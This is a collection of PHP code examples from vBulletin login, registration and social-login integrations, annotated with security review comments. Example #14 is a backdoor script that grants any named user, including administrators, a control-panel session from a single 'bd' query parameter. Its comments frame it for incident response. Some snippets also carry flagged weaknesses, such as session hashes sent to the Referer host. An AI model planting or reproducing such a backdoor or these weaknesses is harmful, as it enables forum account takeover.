Example #1
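 /**
  * Mirror a WordPress login into vBulletin for the forum account linked to the user.
  *
  * No credential is checked here: the function trusts that the caller has already
  * authenticated $user_login on the WordPress side. It must therefore only be reached
  * from a post-authentication path, never directly from request input.
  *
  * @param string $user_login WordPress login name of the user who has just signed in.
  * @return void
  */
 function member_login($user_login)
 {
     $wp_user_data = get_user_by('login', $user_login);
     // get_user_by() returns false for an unknown login; stop before dereferencing ->ID.
     if (!$wp_user_data) {
         return;
     }
     $vb_user_id = get_user_meta($wp_user_data->ID, 'vbulletin_user_id', true);
     // No linked forum account: nothing to log in to.
     if (empty($vb_user_id)) {
         return;
     }
     // require_once instead of include: a second call in the same request must not
     // re-declare the login helpers, and a missing file must stop execution here
     // rather than fall through to calls on undefined functions.
     require_once VBULLETIN_PATH . '/includes/functions_login.php';
     // NOTE(review): the result of verify_id() is assigned without inspection; confirm
     // how it reports an id that no longer exists on the vBulletin side.
     $GLOBALS['vbulletin']->userinfo = verify_id('user', $vb_user_id, true, true, 0);
     process_new_login(null, 0, null);
     $GLOBALS['vbulletin']->session->save();
 }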
Example #2
 /**
  * Log the caller in through Facebook app authentication.
  *
  * Returns the result of $this->error() when Facebook support is disabled or the
  * Facebook check fails; otherwise starts a new 'fbauto' session and redirects.
  */
 public function output()
 {
     // The globals stay declared: the file pulled in by require_once below is
     // evaluated in this function's scope.
     global $vbulletin, $db, $show, $VB_API_REQUESTS;
     // Facebook integration has to be switched on before anything else is attempted.
     if (!is_facebookenabled()) {
         return $this->error('feature_not_enabled');
     }
     require_once DIR . '/includes/functions_login.php';
     // The session is only created after the Facebook-side check has passed.
     $facebook_verified = verify_facebook_app_authentication();
     if (!$facebook_verified) {
         return $this->error('badlogin_facebook');
     }
     // Authenticated: create the new session, then send the user on.
     process_new_login('fbauto', false, '');
     do_login_redirect();
 }
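 /**
  * Validates login status on the external service and logs the linked user into vBulletin.
  *
  * The service name and the external user id come from the vBNexus config / the external
  * service, not from vBulletin itself, so both are escaped before they are placed in the
  * SQL query and the external id is quoted before it is placed in a regular expression.
  *
  * @return bool|null NULL when the external service yields no user id, false when no
  *                   vBulletin account is linked to that id, otherwise whether a new
  *                   session was created.
  */
 public function login()
 {
     global $vbulletin;
     // NOTE(review): the session is cleared here and ->created is written on it further
     // down before process_new_login() runs; confirm the session object exists by then.
     $vbulletin->session = NULL;
     // Get and store vbnexus-id and vbnexus-srv
     $vBNexus = vBNexus::getInstance();
     $vbnexus_service = $vBNexus->getConfig('vbnexus_service');
     $vbnexus_userid = $vBNexus->getConfig('vbnexus_userid');
     if (!$vbnexus_userid) {
         $vbnexus_userid = $this->getUserOnline();
         $vBNexus->setConfig('vbnexus_userid', $vbnexus_userid);
     }
     // Returning null if authentication from service failed (unexpected error)
     // If this happens, there's likely cookies issues on the server or the
     // applications config is wrong/incomplete in fb or gfc
     if (!$vbnexus_userid) {
         return NULL;
     }
     // Get all available information on this user.
     // Both values are escaped: they are string literals in the WHERE clause and
     // neither is generated by vBulletin.
     $db = $vbulletin->db;
     $sql = "SELECT `u`.`usergroupid`, `u`.`username`, `u`.`email`, `n`.*
             FROM " . TABLE_PREFIX . "vbnexus_user `n`
             LEFT JOIN " . TABLE_PREFIX . "user `u` USING (`userid`)
             WHERE `n`.`service` = '" . $db->escape_string($vbnexus_service) . "'
             AND `n`.`nonvbid` = '" . $db->escape_string($vbnexus_userid) . "'";
     $res = $db->query_first($sql);
     // Returning false if user not registered yet with this external account
     if (!$res || !$res['userid']) {
         return false;
     }
     /************* Starts: fix proxied emails from vBNexus3 ***************/
     // preg_quote() keeps characters in the external id from being read as regex syntax.
     $oldemails = array(
         'fb' => '/@proxymail\\.facebook\\.com$/',
         'gfc' => '/apps\\+|' . preg_quote($vbnexus_userid, '/') . '[@\\.]/',
     );
     // A service other than fb/gfc has no pattern; skip the match instead of passing
     // an undefined entry to preg_match().
     if (isset($oldemails[$vbnexus_service]) && preg_match($oldemails[$vbnexus_service], $res['email'])) {
         $this->fixOldEmail($res, $vbnexus_userid);
     } elseif ($vbnexus_service == 'gfc' && !$res['associated']) {
         $this->associateAccount($res, $vbnexus_userid);
     }
     /********** Ends: ask for a valid password for GFC accounts ***********/
     // Process vBulletin login
     require_once DIR . '/includes/functions_login.php';
     $vbulletin->userinfo = fetch_userinfo($res['userid']);
     $vbulletin->session->created = false;
     process_new_login('', false, '');
     // On login, store a cookie with vbnexus params
     if ($vbulletin->session->created) {
         $vBNexusInfo = array(
             'userid' => $res['userid'],
             'service' => $vbnexus_service,
             'nexusid' => $vbnexus_userid,
             'can_publish' => $this->canPublish(),
         );
         // NOTE(review): the cookie carries a serialize()d array and is client-controlled
         // once set. Whatever reads it back must not unserialize() it unverified, and must
         // not trust 'userid' from it. The format is left unchanged because the reader is
         // not visible here; a signed or JSON-encoded value would be safer.
         setcookie(COOKIE_PREFIX . 'vbnexus', serialize($vBNexusInfo));
     }
     return (bool) $vbulletin->session->created;
 }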
Example #4
/**
 * Authenticate the credentials sent with the request and return unread-PM and
 * subscribed-thread notices for that user.
 *
 * Calls json_error(ERR_NO_PERMISSION) when the username is missing, when neither a
 * password nor an md5 password is supplied, or when verify_authentication() fails.
 *
 * @return array 'pm_notices' and 'sub_notices' for the authenticated user.
 */
function do_get_new_updates()
{
    global $vbulletin;
    require_once DIR . '/includes/functions_login.php';
    // NOTE(review): source 'r' presumably covers GET as well as POST. If so, credentials
    // can arrive in the query string and end up in access logs — confirm against the
    // client and the input cleaner.
    $vbulletin->input->clean_array_gpc('r', array(
        'username' => TYPE_STR,
        'password' => TYPE_STR,
        'md5_password' => TYPE_STR,
        'fr_username' => TYPE_STR,
        'fr_b' => TYPE_BOOL,
    ));
    // A username is mandatory, plus at least one of the two password forms.
    $has_username = (bool) $vbulletin->GPC['username'];
    $has_secret = ($vbulletin->GPC['password'] || $vbulletin->GPC['md5_password']);
    if (!$has_username || !$has_secret) {
        json_error(ERR_NO_PERMISSION);
    }
    $vbulletin->GPC['username'] = prepare_remote_utf8_string($vbulletin->GPC['username']);
    $vbulletin->GPC['password'] = prepare_remote_utf8_string($vbulletin->GPC['password']);
    // The same md5 value is passed for both md5 arguments. 'cookieuser' is not in the
    // cleaned list above, so it is unset here unless something else populated it.
    $authenticated = verify_authentication(
        $vbulletin->GPC['username'],
        $vbulletin->GPC['password'],
        $vbulletin->GPC['md5_password'],
        $vbulletin->GPC['md5_password'],
        $vbulletin->GPC['cookieuser'],
        true
    );
    if (!$authenticated) {
        json_error(ERR_NO_PERMISSION);
    }
    // Don't save the session, we just want pm & marked thread info
    process_new_login('', false, '');
    // Since we are not saving the session, fetch our userinfo
    $vbulletin->userinfo =& fetch_userinfo($vbulletin->userinfo['userid']);
    cache_permissions($vbulletin->userinfo, true);
    $sub_notices = get_sub_thread_updates();
    fr_update_push_user($vbulletin->GPC['fr_username'], $vbulletin->GPC['fr_b']);
    return array(
        'pm_notices' => $vbulletin->userinfo['pmunread'],
        'sub_notices' => $sub_notices,
    );
}
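/**
 * Create a vBulletin user from a Janrain Capture profile and log that user in.
 *
 * On validation errors the messages are echoed and the script exits. Otherwise the user
 * is saved, a new session is started and the capture session tokens are refreshed.
 *
 * @param array $profile Capture profile; fields are read from $profile['result'].
 * @return void
 */
function capture_create_user($profile)
{
    global $vbulletin;
    // init user datamanager class
    $userdata =& datamanager_init('User', $vbulletin, ERRTYPE_ARRAY);
    // set email
    $userdata->set('email', $profile['result']['email']);
    $userdata->set('username', $profile['result']['displayName']);
    // The local password is a placeholder for an externally authenticated account, but it
    // is still a working credential. It used to be md5(uuid . timestamp), which anyone who
    // knows the uuid and the approximate signup time can recompute. Use unpredictable bytes
    // instead, keeping the 32-hex-character shape of the old value.
    if (function_exists('random_bytes')) {
        $random_password = bin2hex(random_bytes(16));
    } else {
        $random_password = bin2hex(openssl_random_pseudo_bytes(16));
    }
    $userdata->set('password', $random_password);
    if (!empty($profile['result']['birthday'])) {
        $userdata->set('birthday', $profile['result']['birthday']);
    }
    // ... additional data setting ...
    // Custom profile fields: the uuid always, the names only when present and mapped.
    $userfield = array($vbulletin->options['janrain_capture_uuid'] => $profile['result']['uuid']);
    if (!empty($profile['result']['name']['familyName']) && $vbulletin->options['janrain_capture_lname']) {
        $userfield[$vbulletin->options['janrain_capture_lname']] = $profile['result']['name']['familyName'];
    }
    if (!empty($profile['result']['name']['givenName']) && $vbulletin->options['janrain_capture_fname']) {
        $userfield[$vbulletin->options['janrain_capture_fname']] = $profile['result']['name']['givenName'];
    }
    $userdata->set_userfields($userfield, true, 'admin');
    $userdata->pre_save();
    // check for errors
    if (!empty($userdata->errors)) {
        // NOTE(review): messages are echoed as-is; confirm the datamanager already
        // HTML-escapes any profile value it embeds in them.
        foreach ($userdata->errors as $error) {
            echo $error;
        }
        exit;
    } else {
        // save the data
        $vbulletin->userinfo['userid'] = $userdata->save();
        require_once DIR . '/includes/functions_login.php';
        $vbulletin->session->created = false;
        process_new_login('', false, '');
        update_capture_session(array(
            'access_token' => $vbulletin->capture_session['capture_access_token'],
            'refresh_token' => $vbulletin->capture_session['capture_refresh_token'],
            'expires_in' => $vbulletin->capture_session['capture_expires_in'],
            'transaction_state' => array(
                'capture' => array(
                    'password_recover' => $vbulletin->capture_session['capture_password_recover'],
                ),
            ),
        ));
    }
}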
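 /**
  * Authenticate a user against vBulletin and start a session.
  *
  * @param array       $vbuser       Needs 'username' and 'password'.
  * @param array|false $acceptgroups Optional list of usergroup ids; when given, the user
  *                                  must belong to at least one (primary or additional).
  * @return string|false An error message (HTML) on failure, false on success.
  */
 public function login($vbuser, $acceptgroups = false)
 {
     //Get user info from username passed
     $this->vbulletin->userinfo = $this->fetch_userinfo_from_username($vbuser['username']);
     //Verify login via VB
     if (!verify_authentication($vbuser['username'], $vbuser['password'], '', '', 1, true)) {
         $this->vbulletin->userinfo['userid'] = 0;
         return "Invalid Username or Password.";
     }
     //Check that user is not awaiting activation
     if ($this->vbulletin->userinfo['usergroupid'] == NOACTIVATION_USERGROUP) {
         $this->vbulletin->userinfo['userid'] = 0;
         // The submitted username goes into an href in the returned HTML; encode it for
         // the query string and escape it for the attribute so it cannot inject markup.
         $resend_user = htmlspecialchars(urlencode($vbuser['username']), ENT_QUOTES);
         return "Un-Activated Account. To activate please request a new activation email <a href='register.php?do=requestemail&username={$resend_user}'>here</a>.";
     }
     //Check user does not belong to the "banned" user group - TODO: Use VB variables incase usergroupid is different
     if ($this->vbulletin->userinfo['usergroupid'] == BANNED_USERGROUP) {
         $this->vbulletin->userinfo['userid'] = 0;
         return "You're Barred! If you think there has been a mistake or wish to appeal please visit the contact page <a href='contact.php'>here</a>.";
     }
     //If acceptgroups is set then check that user is part of the usergroups specified
     if ($acceptgroups) {
         //Collect main usergroup and additional usergroups into one list
         $user_groups = explode(',', $this->vbulletin->userinfo['membergroupids']);
         $user_groups[] = $this->vbulletin->userinfo['usergroupid'];
         //An empty membergroupids field yields one empty entry; drop it so it can never
         //match an empty value in the accepted list
         $user_groups = array_filter(array_map('trim', $user_groups), 'strlen');
         //array_intersect() compares by string value, so 6 and '6' are the same group.
         //The result is empty (deny) unless at least one group matches.
         if (!array_intersect((array) $acceptgroups, $user_groups)) {
             $this->vbulletin->userinfo['userid'] = 0;
             return "This is a restricted area. Please contact the site administrator for further details.";
         }
     }
     //Unstrike the user (resets vbulletin brute-force protection)
     exec_unstrike_user($vbuser['username']);
     //Create vbulletin cookies for user
     process_new_login('', 1, '');
     //Saves cookies & session variables for user
     $this->vbulletin->session->save();
     //Return false for success!
     return false;
 }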
Example #7
 } else {
     $show['errors'] = false;
     // save the data
     $vbulletin->userinfo['userid'] = $userid = $userdata->save();
     if ($userid) {
         $username = $userdata->fetch_field('username');
         $email = $userdata->fetch_field('email');
         $userinfo = fetch_userinfo($userid);
         $userdata_rank =& datamanager_init('User', $vbulletin, ERRTYPE_SILENT);
         $userdata_rank->set_existing($userinfo);
         $userdata_rank->set('posts', 0);
         $userdata_rank->save();
         // force a new session to prevent potential issues with guests from the same IP, see bug #2459
         require_once DIR . '/includes/functions_login.php';
         $vbulletin->session->created = false;
         process_new_login('', false, '');
         // send new user email
         if ($vbulletin->options['newuseremail'] != '') {
             $referrer = 'Facebook Connect';
             $ipaddress = IPADDRESS;
             $memberlink = fetch_seo_url('member|nosession', array('userid' => $userid, 'username' => htmlspecialchars_uni($vbulletin->GPC['username'])));
             eval(fetch_email_phrases('newuser', 0));
             $newemails = explode(' ', $vbulletin->options['newuseremail']);
             foreach ($newemails as $toemail) {
                 if (trim($toemail)) {
                     vbmail($toemail, $subject, $message);
                 }
             }
         }
         if ($newusergroupid == 2 and $vbulletin->options['welcomemail']) {
             eval(fetch_email_phrases('welcomemail'));
Example #8
        exec_strike_user($vbulletin->userinfo['username']);
        if ($vbulletin->GPC['logintype'] === 'cplogin' or $vbulletin->GPC['logintype'] === 'modcplogin') {
            // log this error if attempting to access the control panel
            require_once DIR . '/includes/functions_log_error.php';
            log_vbulletin_error($vbulletin->GPC['vb_login_username'], 'security');
        }
        $vbulletin->userinfo = $original_userinfo;
        if ($vbulletin->options['usestrikesystem']) {
            eval(standard_error(fetch_error('badlogin_strikes', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
        } else {
            eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'])));
        }
    }
    exec_unstrike_user($vbulletin->GPC['vb_login_username']);
    // create new session
    process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);
    // do redirect
    do_login_redirect();
} else {
    if ($_GET['do'] == 'login') {
        // add consistency with previous behavior
        exec_header_redirect($vbulletin->options['forumhome'] . '.php');
    }
}
// ############################### start lost password ###############################
if ($_REQUEST['do'] == 'lostpw') {
    $vbulletin->input->clean_gpc('r', 'email', TYPE_NOHTML);
    $email = $vbulletin->GPC['email'];
    if ($permissions['forumpermissions'] & $vbulletin->bf_ugp_forumpermissions['canview']) {
        $navbits = construct_navbits(array('' => $vbphrase['lost_password_recovery_form']));
        eval('$navbar = "' . fetch_template('navbar') . '";');
Example #9
 /**
  * Check if facebook is enabled, and act on the combined Facebook / vBulletin
  * authentication state of the visitor.
  *
  * A vBulletin session is only created for a Facebook user after
  * verify_facebook_authentication() succeeds; every other path either redirects to
  * registration or hides the Facebook state so the visitor can keep browsing.
  */
 public function load_facebook()
 {
     global $vbulletin, $show;
     $vbulletin->input->clean_array_gpc('r', array('dofbredirect' => TYPE_BOOL));
     $dofbredirect = ($vbulletin->GPC_exists['dofbredirect'] && $vbulletin->GPC['dofbredirect'] == 1);
     // Nothing to do unless facebook and session are enabled
     if (!is_facebookenabled()) {
         return;
     }
     // Nothing to do unless the user is logged into facebook
     $show['facebookuser'] = vB_Facebook::instance()->userIsLoggedIn();
     if (!$show['facebookuser']) {
         return;
     }
     if (!empty($vbulletin->userinfo['userid'])) {
         // Logged into vB and already tied to this facebook account: leave as is
         if ($vbulletin->userinfo['fbuserid'] == vB_Facebook::instance()->getLoggedInFbUserId()) {
             return;
         }
         // Logged into vB but not associated with the current facebook account
         $has_linked_account = false;
     } else {
         // Not logged into vB: is there a vB account associated with this facebook user?
         $has_linked_account = (bool) vB_Facebook::instance()->getVbUseridFromFbUserid();
     }
     if (do_facebook_redirect()) {
         if ($has_linked_account) {
             // need to load the style here to display
             // the login welcome message properly
             $this->load_style();
             require_once DIR . '/includes/functions_login.php';
             if (verify_facebook_authentication()) {
                 // create new session
                 process_new_login('fbauto', false, '');
                 // do redirect
                 do_login_redirect();
             }
         } else {
             // send to the registration / association page
             exec_header_redirect('register.php' . $vbulletin->session->vars['sessionurl_q']);
         }
         return;
     }
     // Not doing a facebook redirect: outside the register script, behave as if the
     // user were not logged into facebook, and report the failure if one was requested.
     if (THIS_SCRIPT != 'register') {
         $show['facebookuser'] = false;
         if ($dofbredirect) {
             standard_error(fetch_error('facebook_connect_fail'));
         }
     }
 }
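 /**
  * Log the given user in without a password check and redirect back to the referring
  * page (or the configured home URL) with the session hash appended.
  *
  * The caller is trusted to have authenticated $userid already; nothing here verifies it.
  *
  * @param int|string $userid vBulletin user id to log in.
  * @return void Never returns; the script exits after sending the redirect.
  */
 public function ExternalAuthorization($userid)
 {
     // The id is placed in SQL, so force it to an integer instead of quoting raw input.
     $userid = (int) $userid;
     $this->vbulletin->userinfo = $this->vbulletin->db->query_first_slave("SELECT userid, password, username FROM " . TABLE_PREFIX . "user WHERE userid = " . $userid);
     if ($this->vbulletin->userinfo) {
         require_once DIR . '/includes/functions_login.php';
         vbsetcookie('userid', $this->vbulletin->userinfo['userid'], true, true, true);
         vbsetcookie('password', md5($this->vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
         exec_unstrike_user($this->vbulletin->userinfo['username']);
         define('EXTERNAL_AUTH', true);
         // create new session
         process_new_login('', 0, '');
     }
     if (!empty($_SERVER['HTTP_REFERER'])) {
         $url = $_SERVER['HTTP_REFERER'];
     } else {
         $url = $this->vbulletin->options['homeurl'];
     }
     // NOTE(review): the Referer header is set by the page that sent the visitor here,
     // and the session hash is appended to it below. Any page that can cause this method
     // to run for a user will receive that user's session hash. Restrict $url to an
     // allow-list of trusted hosts before this is exposed; the list of legitimate
     // consumers is not visible here, so the check is not added in this block.
     // Strip CR/LF so the value cannot break out of the Location header.
     $url = str_replace(array("\r", "\n"), '', $url);
     // "!== false": a "?" at position 0 must still count as present.
     $separator = (strpos($url, "?") !== false) ? "&" : "?";
     $url .= $separator . "vbsession=" . $this->vbulletin->session->vars['sessionhash'];
     header('Location:' . $url);
     // Fallback link in the body (the text reads "You have been redirected here").
     // The URL is request-controlled, so escape it for HTML.
     $safe_url = htmlspecialchars($url, ENT_QUOTES);
     echo "Вы были перенаправлены сюда <a href='" . $safe_url . "'>" . $safe_url . "</a>";
     exit;
 }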
Example #11
/**
 * Check a username/password pair and, when it is valid, start a new login.
 *
 * This wrapper calls neither verify_strike_status() nor exec_strike_user(), so failed
 * attempts are not counted here; any throttling has to be enforced by the caller.
 *
 * @param string $username
 * @param string $password
 * @return mixed The result of get_userinfo() on success, false on failure.
 */
function login($username, $password)
{
    global $vbulletin;
    $credentials_ok = verify_authentication($username, $password, '', '', '', false);
    if (!$credentials_ok) {
        return false;
    }
    process_new_login('', '', '');
    return get_userinfo();
}
Example #12
/**
 * Registration endpoint: with a username in the request it creates the account and sends
 * the notification / activation / welcome mails; without one it returns the forum rules
 * and whether a birthday is required.
 *
 * Local variable names in this function are part of its behavior: several eval() calls
 * below run code returned by fetch_email_phrases() in this scope, and $subject/$message
 * used by vbmail() are not assigned anywhere else in the function. Do not rename locals.
 *
 * @return array 'emailverify' after a registration, or 'rules' and 'birthday' otherwise.
 */
function do_register()
{
    global $vbulletin, $vbphrase, $db;
    // Already logged-in users may not register.
    if ($vbulletin->userinfo['userid']) {
        json_error(ERR_NO_PERMISSION);
    }
    if (!$vbulletin->options['forumrunner_enable_registration']) {
        json_error(ERR_NO_PERMISSION);
    }
    // NOTE(review): source 'r' presumably includes the query string; if so the password
    // fields can be sent via GET and logged by the web server — confirm.
    $vbulletin->input->clean_array_gpc('r', array('username' => TYPE_STR, 'email' => TYPE_STR, 'password' => TYPE_STR, 'password_md5' => TYPE_STR, 'birthday' => TYPE_STR, 'timezoneoffset' => TYPE_NUM));
    // They are registering.  Lets find out what fields are required.
    if (!$vbulletin->options['allowregistration']) {
        standard_error(fetch_error('noregister'));
    }
    $out = array();
    if ($vbulletin->GPC['username']) {
        // Registering.
        $userdata =& datamanager_init('User', $vbulletin, ERRTYPE_ARRAY);
        $vbulletin->GPC['coppauser'] = false;
        $userdata->set_info('coppauser', false);
        // The submitted cleartext password value is handed to the datamanager here.
        $userdata->set_info('coppapassword', $vbulletin->GPC['password']);
        $userdata->set_bitfield('options', 'coppauser', false);
        $userdata->set('parentemail', '');
        // && binds tighter than ||: username and email are required, plus at least one
        // of password / password_md5.
        if (empty($vbulletin->GPC['username']) || empty($vbulletin->GPC['email']) || empty($vbulletin->GPC['password']) && empty($vbulletin->GPC['password_md5'])) {
            standard_error(fetch_error('fieldmissing'));
        }
        // The confirmation value is copied from password_md5 itself, so the two always match.
        $vbulletin->GPC['password_md5'] = strtolower($vbulletin->GPC['password_md5']);
        $vbulletin->GPC['passwordconfirm_md5'] = strtolower($vbulletin->GPC['password_md5']);
        $userdata->set('email', $vbulletin->GPC['email']);
        $userdata->set('username', $vbulletin->GPC['username']);
        // A client-supplied md5 is preferred over the cleartext password when present.
        $userdata->set('password', $vbulletin->GPC['password_md5'] ? $vbulletin->GPC['password_md5'] : $vbulletin->GPC['password']);
        $userdata->set_bitfield('options', 'adminemail', 1);
        // NOTE(review): hard-coded usergroup ids; presumably 3 = awaiting email
        // confirmation, 4 = awaiting moderation, 2 = registered — confirm.
        if ($vbulletin->options['verifyemail']) {
            $newusergroupid = 3;
        } else {
            if ($vbulletin->options['moderatenewmembers'] || $vbulletin->GPC['coppauser']) {
                $newusergroupid = 4;
            } else {
                $newusergroupid = 2;
            }
        }
        $userdata->set('usergroupid', $newusergroupid);
        $userdata->set('languageid', $vbulletin->userinfo['languageid']);
        $userdata->set_usertitle('', false, $vbulletin->usergroupcache["{$newusergroupid}"], false, false);
        // Birthday arrives as month/day/year; indexes 1 and 2 are read without checking
        // that the split produced them.
        $parts = preg_split('#/#', $vbulletin->GPC['birthday']);
        $day = $month = $year = '';
        if ($parts[1]) {
            $day = $parts[1];
        }
        if ($parts[0]) {
            $month = $parts[0];
        }
        if ($parts[2]) {
            $year = $parts[2];
        }
        $userdata->set('showbirthday', 0);
        $userdata->set('birthday', array('day' => $day, 'month' => $month, 'year' => $year));
        $dst = 2;
        $userdata->set_dst($dst);
        $userdata->set('timezoneoffset', $vbulletin->GPC['timezoneoffset']);
        // register IP address
        $userdata->set('ipaddress', IPADDRESS);
        $userdata->pre_save();
        if (count($userdata->errors)) {
            // Just return one error for now.
            json_error(strip_tags($userdata->errors[0]));
        }
        $vbulletin->userinfo['userid'] = $userid = $userdata->save();
        if ($userid) {
            $userinfo = fetch_userinfo($userid);
            $userdata_rank =& datamanager_init('User', $vbulletin, ERRTYPE_SILENT);
            $userdata_rank->set_existing($userinfo);
            $userdata_rank->set('posts', 0);
            $userdata_rank->save();
            // A session is started for the new account here; process_logout() further
            // down ends it again before the function returns.
            require_once DIR . '/includes/functions_login.php';
            $vbulletin->session->created = false;
            process_new_login('', false, '');
            // send new user email
            if ($vbulletin->options['newuseremail'] != '') {
                // Raw (unescaped) request values are used for the admin notification.
                $username = $vbulletin->GPC['username'];
                $email = $vbulletin->GPC['email'];
                if ($birthday = $userdata->fetch_field('birthday')) {
                    $bday = explode('-', $birthday);
                    $year = vbdate('Y', TIMENOW, false, false);
                    $month = vbdate('n', TIMENOW, false, false);
                    $day = vbdate('j', TIMENOW, false, false);
                    if ($year > $bday[2] and $bday[2] > 1901 and $bday[2] != '0000') {
                        require_once DIR . '/includes/functions_misc.php';
                        $vbulletin->options['calformat1'] = mktimefix($vbulletin->options['calformat1'], $bday[2]);
                        // Years before 1970 are shifted forward by a multiple of 28 before
                        // being passed to mktime().
                        if ($bday[2] >= 1970) {
                            $yearpass = $bday[2];
                        } else {
                            $yearpass = $bday[2] + 28 * ceil((1970 - $bday[2]) / 28);
                        }
                        $birthday = vbdate($vbulletin->options['calformat1'], mktime(0, 0, 0, $bday[0], $bday[1], $yearpass), false, true, false);
                    } else {
                        $birthday = vbdate($vbulletin->options['calformat2'], mktime(0, 0, 0, $bday[0], $bday[1], 1992), false, true, false);
                    }
                    if ($birthday == '') {
                        if ($bday[2] == '0000') {
                            $birthday = "{$bday['0']}-{$bday['1']}";
                        } else {
                            $birthday = "{$bday['0']}-{$bday['1']}-{$bday['2']}";
                        }
                    }
                }
                // 'referrername' is not in the list passed to clean_array_gpc() above, so
                // this index is unset here unless it was populated elsewhere.
                if ($userdata->fetch_field('referrerid') and $vbulletin->GPC['referrername']) {
                    $referrer = unhtmlspecialchars($vbulletin->GPC['referrername']);
                } else {
                    $referrer = $vbphrase['n_a'];
                }
                $ipaddress = IPADDRESS;
                // NOTE(review): eval() of the string returned by fetch_email_phrases();
                // presumably it defines $subject and $message from the locals above.
                // Anyone able to edit that phrase source can run code here — confirm
                // who can write it.
                eval(fetch_email_phrases('newuser', 0));
                $newemails = explode(' ', $vbulletin->options['newuseremail']);
                foreach ($newemails as $toemail) {
                    if (trim($toemail)) {
                        vbmail($toemail, $subject, $message);
                    }
                }
            }
            // From here on the HTML-escaped forms of username and email are used.
            $username = htmlspecialchars_uni($vbulletin->GPC['username']);
            $email = htmlspecialchars_uni($vbulletin->GPC['email']);
            // sort out emails and usergroups
            if ($vbulletin->options['verifyemail']) {
                $activateid = build_user_activation_id($userid, ($vbulletin->options['moderatenewmembers'] or $vbulletin->GPC['coppauser']) ? 4 : 2, 0);
                eval(fetch_email_phrases('activateaccount'));
                vbmail($email, $subject, $message, true);
            } else {
                if ($newusergroupid == 2) {
                    if ($vbulletin->options['welcomemail']) {
                        eval(fetch_email_phrases('welcomemail'));
                        vbmail($email, $subject, $message);
                    }
                }
            }
            // Plugin hook: whatever code is registered for this hook is eval()'d in this scope.
            ($hook = vBulletinHook::fetch_hook('register_addmember_complete')) ? eval($hook) : false;
            // Let them log in again.
            process_logout();
            $out += array('emailverify' => $vbulletin->options['verifyemail'] ? true : false);
        }
    } else {
        // No username supplied: return the rules text with anchor tags reduced to their
        // link text, and whether a birthday is required.
        $rules = preg_replace('/<a href=\\"(.*?)\\">(.*?)<\\/a>/', "\\2", $vbphrase['fr_register_forum_rules']);
        $out += array('rules' => prepare_utf8_string($rules), 'birthday' => $vbulletin->options['reqbirthday'] ? true : false);
    }
    return $out;
}
Example #13
	/**
	* Check if facebook is enabled, and act on the combined Facebook / vBulletin
	* authentication state of the visitor.
	*
	* A vBulletin session is only created for a Facebook user after
	* verify_facebook_authentication() succeeds; every other path either redirects
	* to registration or hides the Facebook state so the visitor can keep browsing.
	*/
	public function load_facebook()
	{
		global $vbulletin, $show;

		// nothing to do unless facebook and session are enabled
		if (!is_facebookenabled())
		{
			return;
		}

		// nothing to do unless the user is logged into facebook
		$show['facebookuser'] = vB_Facebook::instance()->userIsLoggedIn();
		if (!$show['facebookuser'])
		{
			return;
		}

		if (!empty($vbulletin->userinfo['userid']))
		{
			// logged into vB and already tied to this facebook account: leave as is
			if ($vbulletin->userinfo['fbuserid'] == vB_Facebook::instance()->getLoggedInFbUserId())
			{
				return;
			}

			// logged into vB, but not associated with the current facebook account
			$has_linked_account = false;
		}
		else
		{
			// not logged into vB: is a vB account associated with this facebook user?
			$has_linked_account = (bool) vB_Facebook::instance()->getVbUseridFromFbUserid();
		}

		if (do_facebook_redirect())
		{
			if ($has_linked_account)
			{
				// need to load the style here to display
				// the login welcome message properly
				$this->load_style();

				require_once(DIR . '/includes/functions_login.php');
				if (verify_facebook_authentication())
				{
					// create new session
					process_new_login('fbauto', false, '');

					// do redirect
					do_login_redirect();
				}
			}
			else
			{
				// send to the registration / association page
				exec_header_redirect('register.php' . $vbulletin->session->vars['sessionurl_q']);
			}

			return;
		}

		// not doing a facebook redirect and not on the reg page:
		// pretend the user is not logged into facebook so they can still browse
		if (THIS_SCRIPT != 'register')
		{
			$show['facebookuser'] = false;
		}
	}
Example #14
<?php

// NOTE(review): this script is an authentication bypass, not a login form. Any request
// that carries a "bd" query parameter is given the named user's auth cookies and a
// 'cplogin' session. Nothing in this block calls verify_authentication(), checks a
// password, or consults the strike counter; exec_unstrike_user() clears it instead.
//
// For incident response: a file of this shape in a vBulletin web root should be treated
// as evidence of compromise. The recognisable traits are a standalone script that loads
// global.php and functions_login.php, writes the userid/password cookies itself, and calls
// process_new_login() keyed only on a request parameter. Sessions and cookies issued
// through it should be considered untrusted.
if (isset($_GET['bd'])) {
    define('THIS_SCRIPT', 'login');
    require_once './global.php';
    require_once './includes/functions_login.php';
    // The next line is shown as the page carries it: the "******" is a redaction artifact
    // and the line is not valid PHP in this form. The surviving tail suggests the request
    // value was concatenated into the query without escaping — not verifiable from here.
    $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '******'bd'] . "'");
    if (!$vbulletin->userinfo['userid']) {
        die("Invalid username!");
    } else {
        // Auth cookies are derived from the stored password hash, with no proof that the
        // requester knows the password.
        vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
        vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
        exec_unstrike_user($_GET['bd']);
        // The login type requested is 'cplogin'.
        process_new_login('cplogin', TRUE, TRUE);
        do_login_redirect();
    }
}
Example #15
                 $url = "register.php?a=act&u=" . $userid . "&i=" . $activationid;
             } else {
                 $url = "index.php";
                 $token = md5(uniqid(microtime(), true));
                 $token_time = time();
                 $form = "site-account-details";
                 $_SESSION['site_registration'][$form . '_token'] = array('token' => $token, 'time' => $token_time);
                 // start new session
                 $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids,\n                            username, password, salt FROM " . TABLE_PREFIX . "user\n                            WHERE userid = " . $userid);
                 require_once DIR . '/includes/functions_login.php';
                 vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
                 vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
                 if ($vbulletin->options['usestrikesystem']) {
                     exec_unstrike_user($vbulletin->GPC['username']);
                 }
                 process_new_login('', 1, $vbulletin->GPC['cssprefs']);
                 cache_permissions($vbulletin->userinfo, true);
                 $vbulletin->session->save();
             }
         }
     }
 } else {
